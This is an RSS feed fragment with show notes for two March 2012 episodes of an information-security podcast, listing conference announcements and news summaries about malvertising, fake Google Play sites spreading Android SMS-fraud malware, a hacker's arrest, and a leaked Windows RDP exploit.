<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In July 2010, Naked Security&#39;s Graham Cluley found one such malvert that turned out to be a lovely example of meta-malware: my newly fabricated term for malware that promises to eradicate malware.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Graham found the malvert by doing a Google search on the term &quot;malware&quot;. Lo, the top sponsored link was a fake anti-virus company that urged visitors to download software that turned out to be a Trojan. Take a look at the video he made:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">(Enjoy this video? You can check out more on the</span><a href="http://www.youtube.com/sophoslabs"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:underline;vertical-align:baseline;">SophosLabs YouTube channel</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and subscribe if you like)</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If we were to use that search term &#8211; &quot;malware&quot; &#8211; as a litmus test, we&#39;d find that Google has cleaned up nicely over the past 2.5 years. The top sponsored links on 15 March 2012 were in fact for actual anti-malware from Symantec and Malwarebytes.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google has, to date, spent millions building technical architecture and advanced machine learning models to better detect these bad ads and automatically prevent them from ever appearing on its platform in the first place.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In Wednesday&#39;s blog, Ramaswamy outlined these recent, additional improvements to those detection systems:</span></p>
<ul style="margin-top:0pt;margin-bottom:0pt;">
<li style="list-style-type:disc;font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Improved &ldquo;query watch&rdquo; for counterfeit ads: While anyone can report counterfeit ads, we&rsquo;ve widened our proactive monitoring of sensitive keywords and queries related to counterfeit goods which allows us to catch more counterfeit ads before they ever appear on Google</span></li>
<li style="list-style-type:disc;font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New &ldquo;risk model&rdquo; to detect violations: Our computer scanning depends on detailed risk models to determine whether a particular ad may violate our policies, and we recently upgraded our engineering system with a new &ldquo;risk model&rdquo; that is even more precise in detecting advertisers who violate our policies</span></li>
<li style="list-style-type:disc;font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Faster manual review process: Some ads need to be reviewed manually. To increase our response time in preventing ads from policy-violating advertisers, we sped up our internal processes and systems for manual reviews, enabling our specialists to be more precise and fast</span></li>
<li style="list-style-type:disc;font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Twenty-four hour response time: We aim to respond within 24 hours upon receiving a reliable complaint about an ad to ensure that we&rsquo;re reviewing ads in a timely fashion</span></li>
</ul>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.softpedia.com/news/Cybercriminals-Keep-Up-Rogue-Google-Play-Sites-Spotted-259079.shtml"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/Cybercriminals-Keep-Up-Rogue-Google-Play-Sites-Spotted-259079.shtml</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google Play has only been recently launched to replace the Android Market and as it turns out, cybercriminals are not wasting any time. Security researchers identified a number of newly created Russian domains that hosted Google Play-lookalike sites that served malicious applications.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://blog.trendmicro.com/fake-google-play-site-leads-to-rogue-apk-app/?utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed:+Anti-MalwareBlog+%28Trend+Micro+Malware+Blog%29&amp;utm_content=Google+Reader"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Trend Micro</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> experts found that the websites were cleverly designed to mimic the legitimate Google Play site.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Created to target Russian users, the sites promise not only applications and games, but also e-books, movies, &ldquo;google music&rdquo; and &ldquo;world music&rdquo;.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Once the images from the site are clicked, the unsuspecting user is taken to another suspicious domain that offers Android apps.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">These applications hide a piece of malware called ANDROIDOS_SMSBOXER.AB, which signs up Android device owners to a number of paid services.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Similar to ANDROIDOS_OPFAKE.SME, SMSBOXER.AB inserts unnecessary</span><a href="http://news.softpedia.com/news/Cybercriminals-Keep-Up-Rogue-Google-Play-Sites-Spotted-259079.shtml#"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> files</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> into the APK to avoid being detected by antivirus software. However, experts say that this polymorphic-like behavior isn&rsquo;t very effective and security applications can easily detect the malicious files.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;If anything, this attack shows just how quick cybercriminals can adapt to the fast-changing mobile landscape. Users are strongly advised to practice extreme caution when dealing with apps and app stores in general,&rdquo; Trend Micro Fraud Analyst Karla Agregado wrote.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As many users were aware, Android Market was highly targeted by cyber crooks. Thousands of shady Market sites have been removed throughout the years by security solutions providers and there&rsquo;s nothing to indicate that the things will be different with the new Google Play.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.zdnet.com/blog/security/iphone-ps3-hacker-geohot-arrested/10828"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.zdnet.com/blog/security/iphone-ps3-hacker-geohot-arrested/10828</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">George Hotz, aka geohot, has been arrested by Texas police on drugs charges while on his way to give a talk to the annual SXSW festival in Austin.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hotz, who shot to fame when he was sued by Sony for cracking his PS3 gaming console, was arrested at a notorious police checkpoint in the West Texas town of Sierra Blanca, and found to have a small amount of marijuana in his car. The Sierra Blanca police have claimed a number of similar high-profile busts for pot possession at the same checkpoint, including Snoop (Doggy) Dog and Willie Nelson.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to the Abovethelaw blog, Hotz and a friend were stopped at the checkpoint after a drug-sniffing dog took an interest in them. Police found a 1/4 oz of dope and edibles containing a further 1/8 oz, but the police booked him for the entire weight of the stash, valuing it at $800 and earning Hotz a felony rap.</span><img height="323px;" src="https://lh5.googleusercontent.com/wEN5VPgWjkkIDPXKPts-5n-H4cOrRQv6e5ovCNNC5NMlkj-T7_OfXf4lbxNQ4KUUQCZUoITf9Lzx5BS2YNHxTDhf-NC_L8_yrcBom4KdVVcj4ml9GQQ" width="290px;" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-621-bsides-wtf-ms12-020-exploit-anit-sourceforge-130m-scams-you-logo-fake-google-play-and-geopot/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3647/0/infosec-daily-podcast-episode-621.mp3" length="23610601" type="audio/mpeg" />
		<itunes:duration>0:49:08</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 621 for March 16, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Dr. Bonez.
&#160;
Announcements:
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 621 for March 16, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Dr. Bonez.
&#160;
Announcements:
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training
&#160;
InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
&#160;
Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
Defcon 20
	When: July 26-29, 2012
	Where: Rio Hotel and Casino &#8211; Las Vegas, NV
	http://defcon.org/
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: &#160;BSides WTF? &#160;Charging for a &#8220;Free&#8221; Security Conference. &#160;Srsly?
&#160;
Source: &#160;&#160;http://threatpost.com/en_us/blogs/ms12-020-rdp-exploit-found-researchers-say-code-may-have-leaked-security-vendor-031612
There is a confirmed legitimate working exploit for the MS12-020 RDP vulnerability in Windows circulating already and researchers say it is capable of either crashing or causing a denial-of-service condition on vulnerable machines. Microsoft has warned customers about the possibility of the exploit surfacing quickly and advised them to patch the flaw immediately. The researcher who discovered the vulnerability said that the packet he included in his original advisory was found in the exploit, raising the specter of a data leak somewhere in the pipeline.
The exploit surfaced on a Chinese download site in the last couple of days and researchers have been able to confirm that it causes a blue screen of death on some systems and a DoS condition on other versions of Windows. Experts have said that the RDP bug, which was discovered by Luigi Auriemma, has the potential to be used as the basis for a large-scale worm and the existence of a working exploit is the first step down that road. The exploit will produce a BSOD on Windows 7 and a DoS on Windows XP.
The security research community was buzzing on Friday morning with the news that the exploit from the Chinese site contained an exact copy of the information Microsoft sent out to the members of its Microsoft Active Protection Program (MAPP). That program grants early access to vulnerability and patch information to a select, vetted group of security and antimalware companies, allowing them to prepare defenses for the bugs that Microsoft will patch each month. When the MAPP program began four years ago, Microsoft said that it would take precautions to guard against the possibility of a leak of that valuable information, but didn&#39;t spell out what those measures migh[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 620 &#8211; Fake MS12-020, Pattern Stump, Opera Malware, and Multiword Passwords</title>
		<link>http://www.isdpodcast.com/episode-620-fake-ms12-020-pattern-stump-opera-malware-and-multiword-passwords</link>
		<comments>http://www.isdpodcast.com/episode-620-fake-ms12-020-pattern-stump-opera-malware-and-multiword-passwords#comments</comments>
		<pubDate>Fri, 16 Mar 2012 00:56:07 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3642</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 620 for March 15, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan. &#160; Announcements: InfoSec Southwest When: March 30-April 1 Where: Austin, TX http://www.Infosecsouthwest.com &#160; Outerz0ne 2012 When: April 20-22, 2012 Where: Atlanta, GA http://www.outerz0ne.org &#160; Linuxfest Northwest 2012 When: Saturday, April 28th-29th, 2012 [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 620 for March 15, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1<br class="kix-line-break" /><br />
	Where: Austin, TX<br class="kix-line-break" /><br />
	</span><a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" id="internal-source-marker_0.05495923952642612" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Outerz0ne 2012</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 20-22, 2012<br class="kix-line-break" /><br />
	Where: Atlanta, GA<br class="kix-line-break" /><br />
	</span><a href="http://www.outerz0ne.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.outerz0ne.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &#8211; Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<h5 dir="ltr"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a></h5>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK<br class="kix-line-break" /><br />
	When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD<br class="kix-line-break" /><br />
	</span><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
